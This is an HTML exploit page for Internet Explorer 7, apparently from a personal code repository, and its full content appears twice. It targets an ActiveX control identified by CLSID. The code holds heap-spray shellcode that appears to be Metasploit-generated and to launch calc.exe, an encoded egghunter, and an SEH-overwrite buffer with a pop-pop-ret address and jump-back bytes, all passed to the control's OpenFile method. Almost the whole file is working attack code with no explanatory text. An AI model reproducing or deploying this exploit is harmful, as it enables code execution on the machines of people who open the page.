0x09AL/exploit.html

## exploit.html
<!DOCTYPE html>
<html>
<head>
	<title> Exploit for IE 7 </title>
	<object id="VULNERABLE" classid='clsid:3C88113F-8CEC-48DC-A0E5-983EF9458687'></object>
</head>
<body>

<script type="text/javascript">

function allocateShellcode(){
	var eggTag = "%u3077%u7430";

	var msfShellcode = "%ue8fc%u0082%u0000%u8960%u31e5%u64c0%u508b%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a%uff31%u3cac%u7c61%u2c02%uc120%u0dcf%uc701%uf2e2%u5752%u528b%u8b10%u3c4a%u4c8b%u7811%u48e3%ud101%u8b51%u2059%ud301%u498b%ue318%u493a%u348b%u018b%u31d6%uacff%ucfc1%u010d%u38c7%u75e0%u03f6%uf87d%u7d3b%u7524%u58e4%u588b%u0124%u66d3%u0c8b%u8b4b%u1c58%ud301%u048b%u018b%u89d0%u2444%u5b24%u615b%u5a59%uff51%u5fe0%u5a5f%u128b%u8deb%u6a5d%u8d01%ub285%u0000%u5000%u3168%u6f8b%uff87%ubbd5%ub5f0%u56a2%ua668%ubd95%uff9d%u3cd5%u7c06%u800a%ue0fb%u0575%u47bb%u7213%u6a6f%u5300%ud5ff%u6163%u636c%u652e%u6578%u4100";

	var shellcode = unescape(eggTag + eggTag + msfShellcode)

	var myArray = [];
	for (x = 0; x < 500; x++){
		myArray[x] = shellcode;
	}
}

var crash = "";

junk_size = 644;
size = 1000;


var eggHunter = unescape(
		"%54%5a%d9%eb%d9%72%f4%5f%57%59%49%49%49%49%49" +
		"%49%49%49%49%49%43%43%43%43%43%43%37%51%5a%6a" +
		"%41%58%50%30%41%30%41%6b%41%41%51%32%41%42%32" +
		"%42%42%30%42%42%41%42%58%50%38%41%42%75%4a%49" +
		"%62%46%4e%61%6b%7a%6b%4f%64%4f%30%42%32%72%43" +
		"%5a%44%42%42%78%68%4d%56%4e%37%4c%57%75%61%4a" +
		"%44%34%78%6f%48%38%74%37%74%70%34%70%72%54%6f" +
		"%79%5a%77%6e%4f%53%45%6a%4a%6e%4f%61%65%4a%47" +
		"%69%6f%68%67%41%41"
	);

for(x=0;x<junk_size-eggHunter.length;x++){

	crash += unescape("%90");
}
crash += eggHunter;

nSEH = '%90%90%EB%07'; // JMP SHORT
SEH = '%35%60%6D%74'; // 746D6035  pop pop ret address
jmpBack = '%E9%37%FF%FF%FF'; // JMP Back to the egghunter

crash += unescape(nSEH);
crash += unescape(SEH);

for(x=0;x<10;x++){
	crash += unescape("%90");//Print 10 NOPs
}

crash += unescape(jmpBack);

for(x=0;x<size - junk_size - 4 - 4 - jmpBack.length - 10;x++){
	crash += unescape("%44");
}
allocateShellcode();

VULNERABLE.OpenFile(crash);


</script>
</body>
</html>
	<!DOCTYPE html>
	<html>
	<head>
	<title> Exploit for IE 7 </title>
	<object id="VULNERABLE" classid='clsid:3C88113F-8CEC-48DC-A0E5-983EF9458687'></object>
	</head>
	<body>

	<script type="text/javascript">

	function allocateShellcode(){
	var eggTag = "%u3077%u7430";

	var msfShellcode = "%ue8fc%u0082%u0000%u8960%u31e5%u64c0%u508b%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a%uff31%u3cac%u7c61%u2c02%uc120%u0dcf%uc701%uf2e2%u5752%u528b%u8b10%u3c4a%u4c8b%u7811%u48e3%ud101%u8b51%u2059%ud301%u498b%ue318%u493a%u348b%u018b%u31d6%uacff%ucfc1%u010d%u38c7%u75e0%u03f6%uf87d%u7d3b%u7524%u58e4%u588b%u0124%u66d3%u0c8b%u8b4b%u1c58%ud301%u048b%u018b%u89d0%u2444%u5b24%u615b%u5a59%uff51%u5fe0%u5a5f%u128b%u8deb%u6a5d%u8d01%ub285%u0000%u5000%u3168%u6f8b%uff87%ubbd5%ub5f0%u56a2%ua668%ubd95%uff9d%u3cd5%u7c06%u800a%ue0fb%u0575%u47bb%u7213%u6a6f%u5300%ud5ff%u6163%u636c%u652e%u6578%u4100";

	var shellcode = unescape(eggTag + eggTag + msfShellcode)

	var myArray = [];
	for (x = 0; x < 500; x++){
	myArray[x] = shellcode;
	}
	}

	var crash = "";

	junk_size = 644;
	size = 1000;


	var eggHunter = unescape(
	"%54%5a%d9%eb%d9%72%f4%5f%57%59%49%49%49%49%49" +
	"%49%49%49%49%49%43%43%43%43%43%43%37%51%5a%6a" +
	"%41%58%50%30%41%30%41%6b%41%41%51%32%41%42%32" +
	"%42%42%30%42%42%41%42%58%50%38%41%42%75%4a%49" +
	"%62%46%4e%61%6b%7a%6b%4f%64%4f%30%42%32%72%43" +
	"%5a%44%42%42%78%68%4d%56%4e%37%4c%57%75%61%4a" +
	"%44%34%78%6f%48%38%74%37%74%70%34%70%72%54%6f" +
	"%79%5a%77%6e%4f%53%45%6a%4a%6e%4f%61%65%4a%47" +
	"%69%6f%68%67%41%41"
	);

	for(x=0;x<junk_size-eggHunter.length;x++){

	crash += unescape("%90");
	}
	crash += eggHunter;

	nSEH = '%90%90%EB%07'; // JMP SHORT
	SEH = '%35%60%6D%74'; // 746D6035 pop pop ret address
	jmpBack = '%E9%37%FF%FF%FF'; // JMP Back to the egghunter

	crash += unescape(nSEH);
	crash += unescape(SEH);

	for(x=0;x<10;x++){
	crash += unescape("%90");//Print 10 NOPs
	}

	crash += unescape(jmpBack);

	for(x=0;x<size - junk_size - 4 - 4 - jmpBack.length - 10;x++){
	crash += unescape("%44");
	}
	allocateShellcode();

	VULNERABLE.OpenFile(crash);


	</script>
	</body>
	</html>